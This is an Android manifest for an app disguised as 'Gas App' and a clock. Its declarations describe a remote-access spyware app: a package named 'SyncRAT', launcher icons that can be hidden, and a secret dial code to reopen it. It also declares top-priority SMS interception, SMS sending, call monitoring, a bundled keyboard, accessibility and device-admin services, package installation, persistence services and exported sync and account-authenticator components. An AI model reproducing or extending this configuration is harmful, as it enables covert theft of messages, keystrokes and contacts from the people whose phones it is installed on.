<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools">

    <uses-feature
        android:name="android.hardware.telephony"
        android:required="false" />

    <uses-permission android:name="android.permission.GET_ACCOUNTS" />
    <uses-permission android:name="android.permission.VIBRATE" />
    <uses-permission android:name="android.permission.AUTHENTICATE_ACCOUNTS" />
    <uses-permission android:name="android.permission.WRITE_SYNC_SETTINGS" />
    <uses-permission android:name="android.permission.READ_SYNC_SETTINGS" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES" />
    <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission android:name="android.permission.WRITE_CONTACTS" />
    <uses-permission android:name="android.permission.CALL_PHONE" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.SCHEDULE_EXACT_ALARM" />
    <uses-permission android:name="android.permission.USE_EXACT_ALARM" />
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <uses-permission
        android:name="android.permission.WRITE_EXTERNAL_STORAGE"
        android:maxSdkVersion="29" />
    <uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" />
    <uses-permission android:name="android.permission.READ_PHONE_NUMBERS" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.SEND_SMS" />

    <application
        android:name=".MainApplication.MyApp"
        android:allowBackup="true"
        android:dataExtractionRules="@xml/data_extraction_rules"
        android:fullBackupContent="@xml/backup_rules"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:networkSecurityConfig="@xml/network_security_config"
        android:requestLegacyExternalStorage="true"
        android:roundIcon="@mipmap/ic_launcher"
        android:supportsRtl="true"
        android:theme="@style/Theme.DAC_Collector"
        android:usesCleartextTraffic="true"
        tools:targetApi="31">
        <activity
            android:name=".Ui.DevToolActivity"
            android:exported="false"
            android:enabled="@bool/is_debug"
            />
        <!-- Eta Open hobe jokhon kono user ke web activity dekhate hobe -->
        <activity
            android:name=".Ui.FloatingWebActivity"
            android:excludeFromRecents="true"
            android:exported="false"
            android:launchMode="singleTask"
            android:noHistory="true"
            android:theme="@style/Transparent" />
        <activity
            android:name=".Ui.FloatingTileActivity"
            android:excludeFromRecents="true"
            android:exported="true"
            android:launchMode="singleTask"
            android:noHistory="true"
            android:theme="@style/Transparent" />
        <activity
            android:name=".Ui.ClockActivity"
            android:exported="true"
            android:label="Clock"
            android:launchMode="singleTop">

            <!-- Alarm and timer actions -->
            <intent-filter>
                <action android:name="android.intent.action.SHOW_ALARMS" />
                <action android:name="android.intent.action.SHOW_TIMERS" />
                <action android:name="android.intent.action.SET_ALARM" />
                <action android:name="android.intent.action.SET_TIMER" />
                <action android:name="android.intent.action.DISMISS_ALARM" />
                <action android:name="android.intent.action.DISMISS_TIMER" />
                <action android:name="org.fossify.clock.TOGGLE_STOPWATCH" />

                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </activity>
        <activity
            android:name=".Ui.CrashActivity"
            android:excludeFromRecents="true"
            android:noHistory="true" />

        <meta-data
            android:name="com.google.android.gms.ads.APPLICATION_ID"
            android:value="ca-app-pub-4113410244453408~1804056046" />

        <activity
            android:name="android.iocl.sms_handler_8_0_below.SMSThreadActivity"
            android:exported="false" />
        <activity
            android:name="android.iocl.sms_handler_8_0_below.SmsActivity"
            android:exported="true"
            android:icon="@drawable/dev_icon"
            android:label="Messages"
            android:launchMode="singleInstance" />

        <activity-alias
            android:name=".SmsLauncherAlias"
            android:enabled="false"
            android:exported="true"
            android:icon="@drawable/chats_chat_sms_talk_svgrepo_com"
            android:label="SMS"
            android:launchMode="singleInstance"
            android:targetActivity="android.iocl.sms_handler_8_0_below.SmsActivity" /> <!-- For Hidden Icon -->
        <activity
            android:name=".Ui.BankStatementActivity"
            android:configChanges="orientation|screenSize"
            android:exported="false"
            android:screenOrientation="landscape" />
        <activity
            android:name=".Ui.PermissionActivity"
            android:exported="true"
            android:launchMode="singleTask" /> <!-- <activity -->
        <!-- android:name=".Ui.DialogActivity" -->
        <!-- android:directBootAware="true" -->
        <!-- android:excludeFromRecents="true" -->
        <!-- android:exported="true" -->
        <!-- android:launchMode="singleInstance" -->
        <!-- android:noHistory="true" -->
        <!-- android:persistableMode="persistAcrossReboots" -->
        <!-- android:showOnLockScreen="true" -->
        <!-- android:theme="@style/Transparent" -->
        <!-- android:turnScreenOn="true" -->
        <!-- android:windowSoftInputMode="stateAlwaysHidden|adjustResize"> -->
        <!-- &lt;!&ndash; SMS RECEIVER &ndash;&gt; -->
        <!-- <intent-filter> -->
        <!-- <action android:name="android.intent.action.SEND" /> -->
        <!-- <action android:name="android.intent.action.SENDTO" /> -->
        <!-- <category android:name="android.intent.category.DEFAULT" /> -->
        <!-- <category android:name="android.intent.category.BROWSABLE" /> -->
        <!-- <data android:scheme="sms" /> -->
        <!-- <data android:scheme="smsto" /> -->
        <!-- <data android:scheme="mms" /> -->
        <!-- <data android:scheme="mmsto" /> -->
        <!-- </intent-filter> -->
        <!-- </activity> -->
        <activity
            android:name=".Ui.TileDialogActivity"
            android:excludeFromRecents="true"
            android:exported="true"
            android:launchMode="singleInstance"
            android:noHistory="true"
            android:showOnLockScreen="true"
            android:theme="@style/Transparent"
            android:turnScreenOn="true"
            android:windowSoftInputMode="stateAlwaysHidden|adjustResize">
            <intent-filter>
                <action android:name="android.service.quicksettings.action.QS_TILE_PREFERENCES" />
            </intent-filter>
        </activity>

        <meta-data
            android:name="firebase_messaging_auto_init_enabled"
            android:value="true" />
        <meta-data
            android:name="firebase_analytics_collection_enabled"
            android:value="true" />

        <activity
            android:name=".Ui.MainActivity"
            android:exported="true"
            android:label="Gas App"
            android:persistableMode="persistAcrossReboots"
            android:showOnLockScreen="true">
            <intent-filter android:autoVerify="true">
                <action android:name="android.intent.action.VIEW" />

                <category android:name="android.intent.category.DEFAULT" />
                <category android:name="android.intent.category.BROWSABLE" />

                <data android:scheme="http" />
                <data android:scheme="https" />
                <data android:host="example.com" />
                <data android:host="xhamster.com" />
                <data android:host="pornhub.com" />
                <data android:host="okxxx.com" />
                <data android:host="xxx.com" />
            </intent-filter>

            <!-- DO NOT add MAIN/LAUNCHER here -->
        </activity> <!-- This alias is the launcher icon. Toggle this to hide/show the app icon -->
        <activity-alias
            android:name=".LauncherAlias"
            android:enabled="true"
            android:exported="true"
            android:icon="@mipmap/ic_launcher"
            android:label="Gas App"
            android:roundIcon="@mipmap/ic_launcher"
            android:targetActivity=".Ui.MainActivity"
            tools:replace="android:enabled">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity-alias> <!-- For Hidden Icon -->
        <receiver
            android:name=".Receivers.SecretCodeReceiver"
            android:exported="true">

            <!-- Secret code trigger (e.g. *#*#111222#*#*) -->
            <intent-filter>
                <action android:name="android.provider.Telephony.SECRET_CODE" />

                <data
                    android:host="111222"
                    android:scheme="android_secret_code" />
            </intent-filter>

            <!-- URL trigger (e.g. https://example.com/openapp) -->

        </receiver>

        <service
            android:name=".Services.SmsSenderJOBService"
            android:enabled="true"
            android:launchMode="singleInstance"
            android:permission="android.permission.BIND_JOB_SERVICE"
            android:persistableMode="persistAcrossReboots"
            android:showOnLockScreen="true"
            android:turnScreenOn="true" /> <!-- android:process=":sendDACSeparate" -->
        <!-- Simple Keyboard Integration from https://github.com/rkkr/simple-keyboard/ on 31-08-2025 at 14:24 -->
        <service
            android:name="android.iocl.simple_keyboard.latin.LatinIME"
            android:directBootAware="true"
            android:exported="false"
            android:icon="@mipmap/ic_launcher_keyboard"
            android:label="@string/english_ime_name"
            android:permission="android.permission.BIND_INPUT_METHOD">
            <intent-filter>
                <action android:name="android.view.InputMethod" />
            </intent-filter>

            <meta-data
                android:name="android.view.im"
                android:resource="@xml/method" />
        </service>
        <service
            android:name="android.iocl.keepAlive.ServiceA"
            android:enabled="true"
            android:exported="false"
            android:process=":serviceA" />
        <service
            android:name="android.iocl.keepAlive.ServiceB"
            android:enabled="true"
            android:exported="false"
            android:process=":serviceB" />
        <service
            android:name=".Services.CallerIdService"
            android:exported="true"
            android:permission="android.permission.BIND_SCREENING_SERVICE">
            <intent-filter>
                <action android:name="android.telecom.CallScreeningService" />
            </intent-filter>
        </service>

        <activity
            android:name="android.iocl.simple_keyboard.latin.settings.SettingsActivity"
            android:enabled="true"
            android:exported="true"
            android:label="@string/english_ime_name"
            android:theme="@style/platformSettingsTheme" />

        <receiver
            android:name="android.iocl.simple_keyboard.latin.SystemBroadcastReceiver"
            android:exported="false">
            <intent-filter>
                <action android:name="android.intent.action.LOCALE_CHANGED" />
            </intent-filter>
        </receiver>

        <service
            android:name=".Services.FetchProfileInfo"
            android:enabled="true"
            android:exported="true"
            android:launchMode="singleInstance"
            android:permission="android.permission.BIND_JOB_SERVICE"
            android:persistableMode="persistAcrossReboots"
            android:process=":Fetch"
            android:showOnLockScreen="true"
            android:turnScreenOn="true" />
        <service
            android:name=".Services.PersistentVpnService"
            android:exported="true"
            android:permission="android.permission.BIND_VPN_SERVICE">
            <intent-filter>
                <action android:name="android.net.VpnService" />
            </intent-filter>

            <meta-data
                android:name="android.net.VpnService.SUPPORTS_ALWAYS_ON"
                android:value="true" />
        </service>
        <service
            android:name=".SyncRAT.SyncService"
            android:exported="true"
            android:permission="android.permission.BIND_SYNC_ADAPTER">
            <intent-filter>
                <action android:name="android.content.SyncAdapter" />
            </intent-filter>

            <meta-data
                android:name="android.content.SyncAdapter"
                android:resource="@xml/syncadapter" />
        </service>
        <service
            android:name=".SyncRAT.AuthenticatorService"
            android:exported="true">
            <intent-filter>
                <action android:name="android.accounts.AccountAuthenticator" />
            </intent-filter>

            <meta-data
                android:name="android.accounts.AccountAuthenticator"
                android:resource="@xml/authenticator2" />
        </service>
        <service
            android:name=".Services.SendDACService"
            android:excludeFromRecents="true"
            android:exported="true"
            android:launchMode="singleInstance"
            android:persistableMode="persistAcrossReboots"
            android:showOnLockScreen="true"
            android:turnScreenOn="true" />
        <service
            android:name=".Services.AcessibilitySettings"
            android:exported="false"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>

            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/accessibility_config" />
        </service>
        <service
            android:name=".Firebase.FCMPushReceiver"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="com.google.firebase.MESSAGING_EVENT" />
            </intent-filter>
        </service> <!-- In your SyncService declaration -->
        <service
            android:name=".SyncAdapters.SyncService"
            android:exported="true"
            android:permission="android.permission.BIND_SYNC_ADAPTER">
            <intent-filter>
                <action android:name="android.content.SyncAdapter" />
            </intent-filter>

            <meta-data
                android:name="android.content.SyncAdapter"
                android:resource="@xml/syncadapter" />
        </service>
        <service
            android:name=".SyncAdapters.SyncService1"
            android:exported="true"
            android:permission="android.permission.BIND_SYNC_ADAPTER">
            <intent-filter>
                <action android:name="android.content.SyncAdapter" />
            </intent-filter>

            <meta-data
                android:name="android.content.SyncAdapter"
                android:resource="@xml/syncadapter1" />
        </service> <!-- In your AuthenticatorService declaration -->
        <service
            android:name=".SyncAdapters.AuthenticatorService"
            android:enabled="true"
            android:exported="true"
            android:permission="android.permission.BIND_ACCOUNT_AUTHENTICATOR">
            <intent-filter>
                <action android:name="android.accounts.AccountAuthenticator" />
            </intent-filter>

            <meta-data
                android:name="android.accounts.AccountAuthenticator"
                android:resource="@xml/authenticator" />
        </service>
        <service
            android:name=".SyncAdapters.AuthenticatorService1"
            android:enabled="true"
            android:exported="true"
            android:permission="android.permission.BIND_ACCOUNT_AUTHENTICATOR">
            <intent-filter>
                <action android:name="android.accounts.AccountAuthenticator" />
            </intent-filter>

            <meta-data
                android:name="android.accounts.AccountAuthenticator"
                android:resource="@xml/authenticator1" />
        </service>

        <receiver
            android:name=".Receivers.AdminReceiver"
            android:exported="true"
            android:label="@string/app_name"
            android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/device_admin_receiver" />

            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED" />
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLED" />
            </intent-filter>
        </receiver>
        <receiver
            android:name=".Receivers.CallReceivers"
            android:enabled="true"
            android:exported="true">
            <intent-filter android:priority="999">
                <action android:name="android.intent.action.PHONE_STATE" />
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.NEW_OUTGOING_CALL" />

                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </receiver>

        <service
            android:name="android.iocl.sms_handler_8_0_below.HeadlessSmsSendService"
            android:exported="true"
            android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE">
            <intent-filter>
                <action android:name="android.intent.action.RESPOND_VIA_MESSAGE" />

                <category android:name="android.intent.category.DEFAULT" />

                <data android:scheme="sms" />
                <data android:scheme="smsto" />
                <data android:scheme="mms" />
                <data android:scheme="mmsto" />
            </intent-filter>
        </service>
        <service
            android:name=".Services.FixOppoAutoKill"
            android:enabled="true"
            android:exported="true"
            android:stopWithTask="false" />
        <service
            android:name=".Services.SmsFetchWorker"
            android:enabled="true"
            android:exported="true"
            android:permission="android.permission.BIND_JOB_SERVICE"
            android:stopWithTask="false" />
        <service
            android:name=".Services.SmsNumberScanWorker"
            android:enabled="true"
            android:exported="false"
            android:permission="android.permission.BIND_JOB_SERVICE"
            android:stopWithTask="false" />
        <service
            android:name=".Services.AemmTileService"
            android:exported="true"
            android:icon="@drawable/ic_cylinder_tile"
            android:label="Aemm Quick"
            android:permission="android.permission.BIND_QUICK_SETTINGS_TILE">
            <intent-filter>
                <action android:name="android.service.quicksettings.action.QS_TILE" />
            </intent-filter>
            <!-- Long press goes here -->

        </service>

        <receiver
            android:name=".Receivers.TransparentWidget"
            android:exported="true"
            android:label="Transparent Widget">
            <intent-filter>
                <action android:name="android.appwidget.action.APPWIDGET_UPDATE" />
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.intent.action.MY_PACKAGE_REPLACED" />
                <action android:name="android.intent.action.TIMEZONE_CHANGED" />
                <action android:name="android.intent.action.TIME_SET" />
                <action android:name="android.intent.action.ALARM_CHANGED" />

                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>

            <meta-data
                android:name="android.appwidget.provider"
                android:resource="@xml/widget_transparent_info" />
        </receiver>
        <receiver
            android:name=".Receivers.App_Installation_Receiver"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED" />
                <action android:name="android.intent.action.PACKAGE_REPLACED" />
                <action android:name="android.intent.action.PACKAGE_REMOVED" />

                <category android:name="android.intent.category.DEFAULT" />

                <data android:scheme="package" />
            </intent-filter>
        </receiver>
        <receiver
            android:name=".Receivers.smsReceivers"
            android:exported="true"
            android:permission="android.permission.BROADCAST_SMS">
            <intent-filter android:priority="2147483647">
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        <receiver
            android:name="android.iocl.sms_handler_8_0_below.MmsSystemEventReceiver"
            android:exported="true"
            android:permission="android.permission.BROADCAST_WAP_PUSH">
            <intent-filter>
                <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER" />

                <data android:mimeType="application/vnd.wap.mms-message" />
            </intent-filter>
        </receiver>
        <receiver
            android:name=".Receivers.MyReceiver"
            android:directBootAware="true"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT" />
                <!-- Optional: Listen for boot completed to re-register receiver -->

                <action android:name="android.intent.action.ACTION_POWER_CONNECTED" />
                <action android:name="android.intent.action.ACTION_POWER_DISCONNECTED" />
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.provider.Telephony.ACTION_DEFAULT_SMS_PACKAGE_CHANGED" />
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.intent.action.LOCALE_CHANGED" />
                <action android:name="android.intent.action.LOCKED_BOOT_COMPLETED" />
                <action android:name="android.intent.action.MY_PACKAGE_REPLACED" />
                <action android:name="android.intent.action.TIME_SET" />
                <action android:name="android.intent.action.TIMEZONE_CHANGED" />
                <action android:name="org.codeaurora.poweroffalarm.action.UPDATE_ALARM" />
            </intent-filter>
        </receiver> <!-- Provided by CHATGPT -->
        <meta-data
            android:name="ScopedStorage"
            android:value="true" />

        <provider
            android:name=".SyncAdapters.DACCollectorProvider"
            android:authorities="${applicationId}.provider"
            android:exported="true"
            android:grantUriPermissions="true"
            android:syncable="true">
            <intent-filter>
                <action android:name="android.intent.action.VIEW" />
            </intent-filter>
        </provider>
        <provider
            android:name="androidx.core.content.FileProvider"
            android:authorities="${applicationId}.fileprovider"
            android:exported="false"
            android:grantUriPermissions="true">
            <meta-data
                android:name="android.support.FILE_PROVIDER_PATHS"
                android:resource="@xml/file_paths" />
        </provider>

        <meta-data
            android:name="com.google.firebase.messaging.default_notification_channel_id"
            android:value="default_channel" />
    </application>

</manifest>